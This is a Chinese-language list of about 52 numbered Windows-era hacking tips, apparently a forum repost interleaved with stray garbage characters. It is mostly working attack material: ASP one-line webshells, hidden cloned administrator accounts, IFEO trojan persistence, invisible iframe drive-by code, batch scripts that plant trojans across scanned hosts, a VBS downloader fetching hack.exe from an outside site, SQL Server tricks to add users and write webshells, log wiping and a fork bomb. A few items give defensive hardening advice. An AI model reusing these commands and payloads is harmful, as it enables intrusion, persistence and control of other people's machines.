1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,& |/ g1 T. i; H- ?
cacls C:\windows\system32 /G hqw20:R/ _: @% [# j; b0 H1 t
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
% j1 ~2 ~5 ~/ O( u' p% x3 X恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F" }! _+ R7 H+ ~+ V3 z8 H" _
9 }6 T h* N* i9 K
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。1 V: p3 p& [( k- u; B
2 l7 _& J. e7 d# t7 ~3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。7 e% Z# e2 t* Q( B* h
7 c! y& {9 v( m+ K- L( v+ x- o! z
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
/ D/ r! b* D( f' B8 u( W- ^ W
1 _# g5 @% C8 [' w& L5、利用INF文件来修改注册表) R" u- ~) q$ t) A" ?
[Version]# B5 k- G, u) r) U$ X# u4 m
Signature="$CHICAGO$"
; ]9 ~8 u* O% ^7 {: H[Defaultinstall]
$ f6 u- Y: }& |% M# S2 N; faddREG=Ating
3 R5 v4 ?: i; d# S/ Y! ^. ?' z, Q[Ating]9 L( B( \& S* D, R; X2 j
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
+ T* ]" A% v7 l% B3 S. j0 v' j以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
7 h$ }, l4 s. v2 o5 Hrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
5 k0 y; X8 w! X% F c( i3 Y其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU: O5 E9 o0 ?' v, y7 f2 C. Z
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU/ F- n$ {2 P* S, @: W
HKEY_CURRENT_CONFIG 简写为 HKCC
1 q) E' U9 W6 @$ L' I6 ?! ]0 p0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
, q2 V5 _2 _% C"1"这里代表是写入或删除注册表键值中的具体数据4 Q$ m6 L+ I( \" F! [/ ^* \
1 K9 }7 ^- ]1 u: a4 Z: o2 ~
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,8 m7 n2 j! K3 q+ o5 d
多了一步就是在防火墙里添加个端口,然后导出其键值
$ \6 R' a5 w$ h[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]8 s9 t8 y% k! c- K
. ?" T+ ~: O; r- N6 ^
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
3 R( T" l7 \: r) v5 c9 J% {在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。8 P. U8 i* \$ _7 r( T) D
( r( q0 t3 w) b$ q* a8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
. x4 K/ g. I4 A, A; [) n
0 k0 W1 O1 w& e" m. C) v9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
/ e( ?6 K2 t7 p% `5 U- s+ I可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。% B5 S. n( p: N
/ p- e0 J9 E$ i) L' K2 k M10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”1 S; H$ q7 g* T; n" ~! Q
4 T% w- L6 M. \
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
. r. C2 z. W" L# R& U1 [* W用法:xsniff –pass –hide –log pass.txt
7 E! A6 F: F- T7 N7 d! p3 c4 O1 _& |+ c7 `; C$ _( f
12、google搜索的艺术
4 m5 J* ^4 f/ @- g( _搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
0 p, _8 i/ ^, v1 r6 X# D或“字符串的语法错误”可以找到很多sql注入漏洞。9 r3 H1 P' z$ ^
0 ~. n, n0 [* _6 W
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。$ n4 s, \& U% Z+ L/ ]* G$ {
$ R. F8 V9 \" q; K' `! h. b14、cmd中输入 nc –vv –l –p 1987& z5 `6 ? S4 W% B) _
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃5 i T6 r: ^, Y$ L+ h- F; `
" {! X* r6 z& C/ Q* G3 j; C0 G15、制作T++木马,先写个ating.hta文件,内容为9 B! |9 L4 h4 U+ [( @9 f
<script language="VBScript">& m3 o$ X7 _) `9 X7 j5 ?* g
set wshshell=createobject ("wscript.shell" )( Y8 z& s$ e) @. j% c3 y
a=wshshell.run("你马的名称",1)
; g2 W4 v4 h, _' R- r* h: A! v Vwindow.close& s- x; m* K8 f! ]( _% k1 b
</script>
1 ^3 m4 Q2 Q! R- ^# f# q再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
) s3 j5 r: K8 c8 t& t2 u4 X$ T8 f0 F: T! k( t
16、搜索栏里输入* h* a2 K* m* @# B" f, p6 [% X
关键字%'and 1=1 and '%'='
# o" ~) e, j8 a! s' A& x关键字%'and 1=2 and '%'='' t8 R% U* w8 j3 k+ u+ X7 t
比较不同处 可以作为注入的特征字符! a# b/ X u* ~" R! a0 X6 e
5 y4 _8 _/ A: a. F# T17、挂马代码<html>7 R: w+ B$ u0 S- C
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>: @7 e( Z4 _% ^( k# \" y" _6 L
</html>
9 h& A: `( [& A* w$ X
, w, e( B0 K5 o8 k7 t% z6 G18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
1 a" k( O8 X) ]+ knet localgroup administrators还是可以看出Guest是管理员来。
. U9 _1 b, t) Q' Z( E" C; j1 v) a
- i5 n8 ]4 ?9 {. s: m/ y- W# U19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等6 ~' @0 Z# U" P/ ]
用法: 安装: instsrv.exe 服务名称 路径
# y% \& H( l7 F0 O6 a0 ]" i/ h% `卸载: instsrv.exe 服务名称 REMOVE6 X* f T+ k: ]- u
2 l9 }1 z: d4 k* Q# J9 C+ H
. z" `: V& B; d8 O21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
2 \7 n/ Y5 f8 D5 ^$ P不能注入时要第一时间想到%5c暴库。
! P( J4 Q9 b% C' y2 V% ?$ L7 z7 `3 y0 }' g
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~% N8 R$ `9 x: ]- G
) g9 P. o2 G3 b+ `( L F23、缺少xp_cmdshell时
$ a$ Y' o" N F. U/ A' @0 B尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
6 y$ n# X I- L2 x7 K5 o假如恢复不成功,可以尝试直接加用户(针对开3389的)
1 N7 o6 d$ z0 _, @9 Udeclare @o int5 a" t! j8 V% Z- L) x
exec sp_oacreate 'wscript.shell',@o out
0 {% _2 O5 V% Z' o& c6 Oexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
/ s3 }# r E0 [, U
2 u3 d. g) }6 @. i24.批量种植木马.bat$ r0 N$ Y2 X# N$ e
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中8 q( ] }9 N/ e2 y9 V
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间7 ^+ N! P9 \- x2 t$ Q( h
扫描地址.txt里每个主机名一行 用\\开头+ x. H! ^% P/ r" k- j
0 U( a5 x& K/ q: f5 |9 c' ?* ?25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。- b- @" ~5 m9 D
+ V8 f* n Q" `/ {! ^
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.# B$ h1 }6 C3 B
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.; u, Y9 Z+ ]- q* i. H+ K- f- Y
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
/ k$ f7 d& }' q1 R' W1 G% x
' N" h4 R% l4 _: i27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
; L2 f' l. s6 F" Z6 u. L4 R; M然后用#clear logg和#clear line vty *删除日志
5 O0 B. v" G8 u9 J: c$ y1 V: t7 |% ?4 U8 g
28、电脑坏了省去重新安装系统的方法1 h. n: J- C9 \* V8 C, ?
纯dos下执行,
. F+ @. J3 r, v) q8 T' J! @xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
2 E; \. X4 p' L- }% @; `2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
7 p. z4 f, r2 M* ~' M4 Q
5 n, ^2 E9 [( C+ y8 Y# h8 h29、解决TCP/IP筛选 在注册表里有三处,分别是:
- n4 C0 M T# WHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip' R2 y5 e9 I" z p, h+ C, o
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
6 y1 {& K$ Q: ~HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip0 k1 f1 {+ p s, s2 G; C
分别用* A1 r, f* \- h! U
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip& G4 O& u; m! ^! s- T& ~# R
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip, b q6 A# x2 B9 I2 B) y( |
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
: |% H) m9 G& R# `命令来导出注册表项
5 v9 w* f# @2 `5 u, O* {( Y然后把三个文件里的EnableSecurityFilters"=dword:00000001,/ g9 V3 t! l* w" s
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用* c1 T' g. Q. ~5 m% X
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
4 J& W& u2 |+ F Y
5 C- a/ D' N0 V3 x0 L6 ^" k, s30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
% p: k1 p3 h3 n: k1 Q1 x) FSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
+ y# N7 w% T! D$ _- q
+ W3 q& Q4 ^- s3 {31、全手工打造开3389工具
& v& i/ f; I( D( | N+ k" a* r& [打开记事本,编辑内容如下:
: O' g* q* Z& k$ Vecho [Components] > c:\sql4 ~6 Q# T, d' T: x
echo TSEnable = on >> c:\sql
. L! [7 W8 k6 M v! |! Isysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q' m0 T) p# v! W; d
编辑好后存为BAT文件,上传至肉鸡,执行8 D9 J* }; U2 j+ _- Z4 @$ K
. `9 l( m- n8 C! i
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马* {& I2 P y7 h( j1 Z+ k
' S8 f5 R1 j/ o: T6 T" |
33、让服务器重启, H2 ^$ ~' B1 ?9 Y) H5 m
写个bat死循环:
9 g' ^- f- g0 {4 S; q@echo off, @) q+ o% _" }% [" m/ C7 S
:loop1' `' I1 p6 ~, ]9 [; ~
cls
- f, l- F" b7 s# kstart cmd.exe
" e" B! _4 B7 k5 G2 h& kgoto loop1. Q6 X- m" y8 ~3 _
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
6 n. X3 s9 r4 {) p( v( ~1 a. t- Y4 q
0 F7 l z& J# [34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,2 Q$ j T7 ?' c. x3 a7 e
@echo off
1 e* q! c9 u: F0 ddate /t >c:/3389.txt3 z3 m/ V" v) W' F
time /t >>c:/3389.txt
3 u8 a! I9 j/ J/ q, d, qattrib +s +h c:/3389.bat
% V* X/ c6 I9 M) s O( ?- C3 h- R) xattrib +s +h c:/3389.txt
' Q' [ ^+ b4 p% vnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
( S" ?( E) q( U, a. _并保存为3389.bat
& w/ X' a7 R" {" ~打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
9 T, Q* k: V! I. r8 x# o" s( O/ c/ |! ^4 M* Q @
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
5 ]2 i; f2 P- U4 c% Vstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)3 y" D4 _5 V: Z1 k9 K! @6 t* k
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
# N# I. L' P* V' }, |' H: i. o3 _- ~/ u ?5 p
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
r3 [) G9 z. G" J# w$ ]' Y5 [echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
+ V4 a2 m$ D7 V6 ^* U( Decho 你的FTP账号 >>c:\1.bat //输入账号
" ]) `0 B* Y/ o% Q( q5 [echo 你的FTP密码 >>c:\1.bat //输入密码$ y" g. T+ f |& A
echo bin >>c:\1.bat //登入8 c7 b" u1 A" p$ i1 A# n
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
+ |( t- H5 T, Q/ A/ t5 p3 G- _2 Techo bye >>c:\1.bat //退出- D3 B7 D/ j# t$ G
然后执行ftp -s:c:\1.bat即可
7 Z# O) t. g. z& a0 I2 o8 a
3 g2 j; ~0 Q9 q: t1 ], ~! ^37、修改注册表开3389两法) a% `# D4 L: V7 D; c s
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
2 ^; C% H. y. A) A3 o% m5 G/ |echo Windows Registry Editor Version 5.00 >>3389.reg5 W# I; w( c0 R' m# _; M$ x: i
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg) Z+ f% s" v2 i! q6 e( N3 x+ J
echo "Enabled"="0" >>3389.reg
) T; u$ _. ]. b: u: [9 Zecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows8 N: e3 i1 T2 G( H, q
NT\CurrentVersion\Winlogon] >>3389.reg
4 o _5 h$ k, j Iecho "ShutdownWithoutLogon"="0" >>3389.reg6 ]- h D( {0 n- x
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]% e/ W. W2 _+ X# ~* ^
>>3389.reg" \7 v- ]7 \. b7 N1 R1 n$ K% S
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
/ Z+ {0 k# g% W8 pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
! G; ~, Y* U$ B- `& f/ V>>3389.reg' \. k& p8 }/ a2 O5 h5 P8 o- d
echo "TSEnabled"=dword:00000001 >>3389.reg: T, i, [9 B% g( H5 o! m( {
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg& T8 j7 i4 Q# ^. ~5 u4 p4 G; K
echo "Start"=dword:00000002 >>3389.reg6 K2 k5 U- p' O2 f5 _- h! L1 s
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]5 h4 ~4 n1 Y- u4 _6 U
>>3389.reg
* _! X; i' E; @echo "Start"=dword:00000002 >>3389.reg/ @3 @- q+ W: d3 d3 w
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
) q K" b9 E3 P% O5 J" Y! Uecho "Hotkey"="1" >>3389.reg1 j& ]# z" y$ D% d
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
1 d, ^% w: O8 y& c3 j" H* `Server\Wds\rdpwd\Tds\tcp] >>3389.reg
4 M: `9 B1 J" b+ A5 k% f! Lecho "PortNumber"=dword:00000D3D >>3389.reg
$ M& Z. X/ v- n% o2 I) [ ?echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
7 O5 F: k/ E- v" @Server\WinStations\RDP-Tcp] >>3389.reg
/ T) W& c/ o! K3 f/ H' c5 fecho "PortNumber"=dword:00000D3D >>3389.reg& h. C: `% i5 h" z4 S
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
. R9 i( I2 I% @+ Z, m3 E2 L+ c(如果要改变终端端口只须把上面的两个D3D都改一下就可以了). X( c: l9 `5 e* M& _1 W
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
0 y- G( |9 N" o' [(2)winxp和win2003终端开启
3 c% \4 ?. X% [/ `用以下ECHO代码写一个REG文件:
0 z: E& Z) H0 j+ F4 d t) mecho Windows Registry Editor Version 5.00>>3389.reg% W2 N7 c, P7 t% y% L$ o5 }
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal& L7 M+ c v$ V/ F) ]/ E
Server]>>3389.reg8 ]4 W1 f; i' O
echo "fDenyTSConnections"=dword:00000000>>3389.reg/ L1 J$ e/ ?3 J, n- D. o- v5 U
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
' D% w0 T0 z. c5 ]: a( SServer\Wds\rdpwd\Tds\tcp]>>3389.reg
0 o+ q, z9 g8 p" N, [2 p9 @0 kecho "PortNumber"=dword:00000d3d>>3389.reg
6 M1 }+ j5 C' `1 Y% recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal! L2 x" Z0 U& H1 z: `$ d
Server\WinStations\RDP-Tcp]>>3389.reg T. e5 `' n$ K( h* Y" ^' T
echo "PortNumber"=dword:00000d3d>>3389.reg- p0 T; t) ^( N
然后regedit /s 3389.reg del 3389.reg
2 w" w! p5 V( \+ E; [6 z S: vXP下不论开终端还是改终端端口都不需重启
% o3 W- h% a V& E7 t5 W; A/ ^4 G+ U
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃6 C4 u6 s9 `: p! F+ s0 }
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa') K/ X3 [; v# p& a- U* w3 N
3 ^' E* Q; r3 |
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!; H4 A& H- w, @0 n! ]4 `* I
(1)数据库文件名应复杂并要有特殊字符
5 P/ k2 o% p& _6 L. Q1 z(2)不要把数据库名称写在conn.asp里,要用ODBC数据源7 ?4 _' ?1 I& }. Y. W
将conn.asp文档中的
# N* N: Z* p+ ?( B" [/ NDBPath = Server.MapPath("数据库.mdb")2 U2 y/ t. x9 z# @) i/ f9 o* h
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath7 R# F" A7 W g3 N* `/ I0 w W
, p: o" P1 \$ I! C( u+ y6 ]" ]8 W
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
0 [% s# D9 i' @! X; x(3)不放在WEB目录里
3 Q* F5 J" B/ X; z
! j* } I% P8 C2 @40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
! t# A% Z! n) _- V可以写两个bat文件
! K3 `2 _" Q5 X9 u& y9 {! y; F5 `@echo off
5 c, h3 I# j& e0 s% r+ E4 @@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe* d2 D9 G2 x1 k' B
@del c:\winnt\system32\query.exe
8 T, x: g- y& x/ q6 p@del %SYSTEMROOT%\system32\dllcache\query.exe
6 [: {, c+ w5 c, q; t# D@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的! ]& g/ u7 p3 K) s# g& Q+ j- W
9 \) Q% L, K u, n@echo off; E: a8 l z$ j# C
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
2 X( U1 {: N5 K) n2 w0 _5 Y% f@del c:\winnt\system32\tsadmin.exe# J5 ~( o% t4 C L
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
2 \* G- K% \' A; L3 g! @1 d, t' M
# W, r& F9 q, h2 K41、映射对方盘符
" L* T* a+ @. j; k2 Ntelnet到他的机器上,
2 Z% X! i% j7 {6 l- a3 cnet share 查看有没有默认共享 如果没有,那么就接着运行
% f$ u- e$ f- G- V: Q/ q( i- I0 Enet share c$=c:
- I) Q6 m8 g$ `' znet share现在有c$
+ x8 J3 D( e- ~+ L在自己的机器上运行 @/ [/ a$ {% |! p m4 u5 w, P
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K1 M, z8 b; K3 m3 w4 i) _
% f+ [9 c) c# Q% z; f- \
42、一些很有用的老知识
- G' A, [8 J0 B, F. ktype c:\boot.ini ( 查看系统版本 )
" z; ?$ P R: L- K( d) cnet start (查看已经启动的服务)0 D* c2 ?" b/ w
query user ( 查看当前终端连接 )5 S; b; I: o! L# n6 q, e
net user ( 查看当前用户 )
9 T# E3 e" J: E: unet user 用户 密码/add ( 建立账号 )$ {( h p. r2 k
net localgroup administrators 用户 /add (提升某用户为管理员)) _6 Q' p9 D' I0 H; \6 p/ L8 I
ipconfig -all ( 查看IP什么的 )
8 Z% s( x/ a6 a6 {0 Qnetstat -an ( 查看当前网络状态 )
" Q# ^' g5 Q, C+ nfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
& S/ k& B8 w$ y克隆时Administrator对应1F45 U/ j% h7 j1 f8 [- `
guest对应1F5
8 v0 x& k5 g1 H& D( H( Q3 ^tsinternetuser对应3E83 f! P) k# q# u; u1 s1 ~, g: u
! O5 K, P+ j7 l8 g43、如果对方没开3389,但是装了Remote Administrator Service
, D5 ]4 X4 m+ V+ Z0 H5 {4 D7 B用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接" q. D; G7 u" H3 ~- l! Z8 G
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
$ \3 R+ k, ^0 X# R$ z先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"3 C; Z) U. X3 D7 B3 J# N
5 E9 u5 Q/ i5 d6 {. c' {44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
8 p/ p" A' Z5 S- ^! S- J0 }本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)3 ]* Z( \$ i4 N/ g' t
2 d9 L+ ^6 N6 b1 f
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
8 N' F) @& I+ d& y$ Xecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open6 j: Z; ~7 N. e/ j3 i
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =0 x$ d; h) w9 K2 P7 U. _
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
5 \5 P* p$ x' r# q$ Z' J/ Q1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
6 ]& F! k$ h+ v$ o- v$ l(这是完整的一句话,其中没有换行符)& r$ V/ ^. M+ U$ R% y
然后下载:
" N6 c: o! X* icscript down.vbs http://www.hack520.org/hack.exe hack.exe3 L, {2 q3 K( P. f/ {: }. T
# \& f0 b+ y7 s# I3 [4 c
46、一句话木马成功依赖于两个条件:! H4 K6 z5 {3 H0 R* ~ I1 Q4 w
1、服务端没有禁止adodb.Stream或FSO组件
' X8 l7 ], P- |. c4 c& @2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。9 {! R6 K! y b# X, ~
6 B9 E: k0 m$ K47、利用DB_OWNER权限进行手工备份一句话木马的代码:
9 Y" j( o0 \( ?; D;alter database utsz set RECOVERY FULL--
) j3 W* }2 R$ [% _5 t* M. V;create table cmd (a image)--6 x3 d/ i9 f0 @1 o1 Z0 Q
;backup log utsz to disk = 'D:\cmd' with init--
$ Z, I: M' R# }: {- J0 T;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--. }1 c+ A6 W/ V
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--, r& z: ~4 R8 Q2 L$ i0 o$ W3 M/ P' u: J
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
- i. c+ {# x Q" L- s* I2 e4 X* R2 o
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:+ a6 a4 C+ R: ~5 J2 P. G
3 E. F9 b9 b/ E用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options, A' K ^# ]/ B: J5 z
所有会话用 'all'。. i7 f! m* I& c3 Z& V
-s sessionid 列出会话的信息。% D- O; @# K+ k3 X% T7 Z: L& ^
-k sessionid 终止会话。' r% d5 v: T1 C; _3 b3 K, j
-m sessionid 发送消息到会话。! B) H Y) L8 Y* g g% m" x# |
' v) y* S9 |6 A& b/ Bconfig 配置 telnet 服务器参数。; d4 e' q# c1 D+ e" S0 A
7 H: w4 e$ |& i) D4 R5 scommon_options 为:4 z, V6 ~* _' [
-u user 指定要使用其凭据的用户+ \$ Z4 [ Q" y) \0 ^
-p password 用户密码4 P2 [; c# I b' r s& A
6 c. ?( c- [! ~9 N# L0 cconfig_options 为: b0 l% ?4 T4 Q P
dom = domain 设定用户的默认域$ B+ H6 E6 ?( A- \, h
ctrlakeymap = yes|no 设定 ALT 键的映射7 ^7 b; L6 W! Q3 M2 P9 M9 _
timeout = hh:mm:ss 设定空闲会话超时值, G4 T. G& ?2 \, Q0 T4 o
timeoutactive = yes|no 启用空闲会话。
; q2 M. e4 U: s# H$ F' ~' Z; ^maxfail = attempts 设定断开前失败的登录企图数。
' _# i/ C7 ?# p! `maxconn = connections 设定最大连接数。
4 V1 s% ]6 D1 F% T: bport = number 设定 telnet 端口。7 V/ y% B- L& K" q
sec = [+/-]NTLM [+/-]passwd
+ q7 k( q! L& z* a; q R4 L$ Y; o设定身份验证机构0 N! X7 b0 o& i9 \8 S
fname = file 指定审计文件名。8 g8 R+ G+ e, j% M+ o( U5 W, y
fsize = size 指定审计文件的最大尺寸(MB)。
3 X# z+ R% N# A5 Z* @! n) w! k2 Bmode = console|stream 指定操作模式。
" }! n1 P. f; E: L1 `( M' tauditlocation = eventlog|file|both0 p$ g5 g8 V+ P2 M
指定记录地点
# n% l1 r& p0 {. J" `+ ~4 p6 T0 V+ Gaudit = [+/-]user [+/-]fail [+/-]admin" Y- Y, ]. N$ f
4 z$ I- W6 n- N$ T4 r49、例如:在IE上访问:
, o( x- O7 ?/ Q( swww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
6 [ p" _6 d: w; w. N5 T& V* thack.txt里面的代码是:! g, g8 v: }( f# H8 M* f
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
( ]( e. d- V9 b% v& V把这个hack.txt发到你空间就可以了!
7 [( E r) _1 o3 I6 ^5 q这个可以利用来做网马哦!
3 c ]" N5 u0 ?+ w/ }4 n, `" b3 n. c% r0 U/ ^: B3 C
50、autorun的病毒可以通过手动限制!
3 z p6 u/ e( j* \7 B5 X1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!& z) _9 ?' B4 t0 E4 D
2,打开盘符用右键打开!切忌双击盘符~
& D- T: c; y& G8 O g Y9 B3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!$ I& n( w& \" l1 h. s' G
9 [9 p5 c: {: d7 D
51、log备份时的一句话木马:1 h3 \# e3 e. V) p2 m6 e8 F+ M+ q" H3 g
a).<%%25Execute(request("go"))%%25>
& j: R8 F4 L; P# Q/ A5 ]2 F6 ib).<%Execute(request("go"))%>) {7 ]( t( I. j$ P2 L# b
c).%><%execute request("go")%><%
: m' h6 ^( Y; X. s0 R& td).<script language=VBScript runat=server>execute request("sb")</Script>
& |: P' }3 h) Q( n A6 v7 F# M' A1 De).<%25Execute(request("l"))%25>
0 }( \% Y5 h$ t$ s- y9 V/ q/ z( Kf).<%if request("cmd")<>"" then execute request("pass")%>/ z0 Z; q9 [) D0 Q/ O
% j a d- O0 r5 Q3 ~% p52、at "12:17" /interactive cmd
